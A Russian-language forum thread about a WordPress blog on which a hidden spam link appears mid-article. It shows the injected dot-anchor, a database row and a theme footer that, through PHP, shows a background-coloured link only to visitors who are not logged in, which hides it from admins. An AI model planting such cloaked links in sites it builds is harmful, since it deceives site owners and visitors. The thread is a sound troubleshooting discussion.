Взломали сайт на Wordpress

[GeoLik 42]

Не хаживаю я на сайты по Worpress давненько.. Поэтому решил спросить здесь, поскольку зараза может быть не только в вордпресе.

 

Сегодня моя знакомая обнаружила, что в одной из статей есть ссылка вот из такой конструкиции:

<a href="http://domen.su" style="text-decoration:none;border:none">.</a>

т.е. ссылка анкором с точки в середине текста статьи. Само собой тот домен не стал писать, а ведет он на детский сайт на юкозе, где торгуют каким то барахлом. Назвали сайт как канадскую панк-рок группу известную среди детей.

 

В коде статьи этой ссылки и ее частей нет. В базе тоже нет. Прошерстил все файлы в нескольких кодировках (что позволяет Тотал). Ничего не нашел.

 

В общем, ссылку можно найти только если смотреть исходный код страницы. В соседних статьях нет, но все 180 статей проверить (ведь приходится через исходный код страницы..) долго, пока не стал. Но наверно это и без разницы.

Ссылка все время одна и та же, и втом же месте.

Где может сидеть зараза и в каком виде?

[Ph-A 395]

Где может сидеть зараза и в каком виде?

Не видя кода...

[Fisana 700]

Про уязвимость в шаблонах вордпресс

http://mastertalk.ru/topic138662.html

[Ph-A 395]

Про уязвимость в шаблонах

Так и подумал про шаблон.

[GeoLik 42]

Спасибо! Но всплывающего окна с хелло нет. И не должно быть, т.к. девушка старательно обновляла.

Возможно, дырка была в прошлом, но код где-то сидит то ли в шаблоне, то в других частях.

 

Ссылку отсюда удалил

 

Не верю я, что мужчина может полюбить чужого ребенка, как своего собственного сына.

- вот текст, в конце с точки ссылка.

[Fisana 700]

Не вижу там такого текста

[GeoLik 42]

В середине статьи

[Fisana 700]

Ну есть там ссылка. Но как можно понять, как она выводится?

В исходном коде не определить.

[GeoLik 42]

Вот статья мускуле:

 

 

 

(43, 1, '2010-06-06 13:18:00', '2010-06-06 09:18:00', '<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_OU78nv7qjd8/TAwOxWoPPjI/AAAAAAAAAQk/bq1xK3T4SOA/s1600/People_Children_Father_and_son___Children_012789_.jpg"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 200px; height: 125px;" src="http://3.bp.blogspot.com/_OU78nv7qjd8/TAwOxWoPPjI/AAAAAAAAAQk/bq1xK3T4SOA/s200/People_Children_Father_and_son___Children_012789_.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5479771087653781042" /></a>Никогда, с самого рождения моего сына, я не жалела и не сомневалась в правильности своего решения - не смотря ни на что, родить и воспитать сына. И никогда не жалела своего ребенка из-за того, что у него нет отца. Ведь я ему даю столько любви, что и несколько отцов столько не дадут.<div>А вот сегодня, гуляя с сыном на детской площадке, один эпизод, имевший место там быть, вывел меня из равновесия и пошатнул мою уверенность. Один мальчик вышел во двор гулять вместе со своим папой, они весело играли в футбол, смеялись, разговаривали о своих мужских делах... А мой сын, увидев этого папу, подбежал к воротам площадки и стал там, как вкопанный, не сводя глаз с этого мужчины. Я сначала не поняла в чем дело, думала, ему хочется мяч взять. Но потом все поняла - сын смотрел на него такими глазами, как у того кота из Шрека - грустными, жалостливыми, вопрошающими... Он очень долго так стоял и смотрел, пока счастливая парочка не ушла домой. Потом спокойно взял совочек и ведерочку, сел в песочницу и стал тихонько играть. А я сижу рядом с ним, смотрю на него, а у самой сердце от боли и жалости  сжалось. Нет, мне не себя стало жалко, не свою не сложившуюся судьбу, не то, что так и не смогла выйти замуж и познать радости семейного счастья. Стало жалко его... сына... что он НИКОГДА не узнает настоящей отцовской любви и заботы, НИКОГДА не будет вот так весело и задорно играть с ним в футбол, ездить на рыбалку, ходить в кино, рассказывать ему о своих мальчишеских проблемах, о которых с мамой разговаривать не положено... Не будет всего этого... даже если я и выйду когда-нибудь замуж, это все будет не то... Не верю я, что мужчина может полюбить чужого ребенка, как своего собственного сына. Если уж родной отец да отказался, то что говорить о чужих....</div><div>Сейчас, когда пишу эти строки, чуть-чуть уже успокоилась, начала более трезво смотреть на эту ситуацию. Да, многие нас, матерей-одиночек, считают эгоистками, родившими детей "для себя", что мы намеренно лишили своих детей отцов и нормальной счастливой жизни в полной семье. Да, может быть и так. Но есть одно НО. Отбросив все рассуждения по поводу того, что семья семье рознь и неизвестно в какой ребенку лучше жить, ответьте на такой вопрос: неужели лучше лишить ребенка жизни, сделав аборт, чем подарить ребенку жизнь, лишив его отца? Каждый выбирает для себя и сам отвечает за свой выбор и несет свой крест. Я выбрала второй вариант и я сама отвечу за этот выбор. А те, кто меня осудит - Бог им судья... А отцы, которые отказываются от своих детей... ну что же...  это тоже их выбор и они тоже за это ответят  когда-нибудь... </div><div><br /></div><div>___________________________</div><div>P.S. Этот рассказ написан специально для конкурса, проводимого на <a href="http://www.blogimam.com/">"Блогах Мам"</a>, при участии спонсоров:<br />1. <a href="http://shop4mama.ru/">“Магазинчик для мамы и ее крохи“</a> – одежда для беременных и кормящих. А также слинги, подгузники, косметика, товары для детей, игрушки и т. д.<br />2. Мария Климова, автор книги <a href="http://kuzma.nya.ru/pages/da_book">«Разговоры в песочнице, или Истории из жизни мам»</a>. </div><div>Конкурс проводится с 1 по 30 июня, так что будем ждать результатов голосования. </div><div><br /></div>', 'Исповедь матери-одиночки…', '', 'publish', 'open', 'open', '', 'blog-post_2500',

 

 

 

Раньше блог стоял на блогспоте гугла, после конвертирования в вордпресс много мусора. Но оно не мешало.

 

 

По исходнику не найти. Нет и в базе, нет и в файлах...

[Ph-A 395]

Вот статья мускуле

Забавно

 

По исходнику не найти

Сложно, но можно. Ссылки на сайт давно кодируют яваскриптом.

[GeoLik 42]

99% что зараза сидит в шаблоне. Кстати, он был переведен какими-то студентами, ссылка на их сайт в шаблоне есть.

 

В общем, если переключаться (надо было сразу) на другой шаблон, ссылка пропадает.

 

И такой важный момент: ссылки на сайте нет, если авторизоваться админом!!!!!

 

Проследил шаблон до 27 января сего года - без изменений. Скорее всего бяку посадили распространители шаблона.

Если кто желает раскурочить шаблон на предмет заразы, могу выслать.

[siv1987 2630]

Выкладывайте, посмотрим что там.

Скрытые ссылки, особенно обфусцированные, не редкость в шаблонах вордпресса.

[GeoLik 42]

Выкладываю без графических файлов:

Golden_Fields.zip

[Ph-A 395]

99% что зараза сидит в шаблоне

Скорее всего. Хотя я вначале подумал, что вы сами верстали шаблон

 

Кстати, он был переведен какими-то студентами, ссылка на их сайт в шаблоне есть.

Не увидел

 

И такой важный момент: ссылки на сайте нет, если авторизоваться админом!!!!!

Это нормально

[GeoLik 42]

Не увидел

Ссылка была внизу слева цветом фона:

 

 

<div class="art-Footer">
   <div class="art-Footer-inner">
               <a href="<?php bloginfo('rss2_url'); ?>" class="art-rss-tag-icon" title="RSS"></a>
               <div class="art-Footer-text">
<p>
Все права защищены © <?php the_time('Y'); ?> <a href="/"><strong><?php bloginfo('name'); ?></strong></a>
</p>
</div>
   </div>
   <div class="art-Footer-background">
   </div>
</div>

   </div>
</div><!-- Пожалуйста, сохраните все ссылки на нижней сноске, если Вы уважаете работу создателя и переводчика. -->
<div class="cleared"></div>
<p class="art-page-footer"><?php if ($user_ID) : ?><?php else : ?>
<div style="font-size:9px; color:#FDEFD8;">Дизайн: <a href="http://mgudt.com/" rel="nofollow" style="color:#FDEFD8;text-decoration: none;">mgudt</a></div>
<?php endif; ?></p></div>

<div><?php wp_footer(); ?></div>
</body>
</html>

 

 

 

И выглядит вот так (авторизованный админ тоже не видит):

 

Хотя сама тема называется "Golden Fields 1.0 от Steve Dubloon", при чем тут наши студенты?

 

 

Сейчас на сайте дефолтный скин от разработчиков WP - от греха подальше :blink: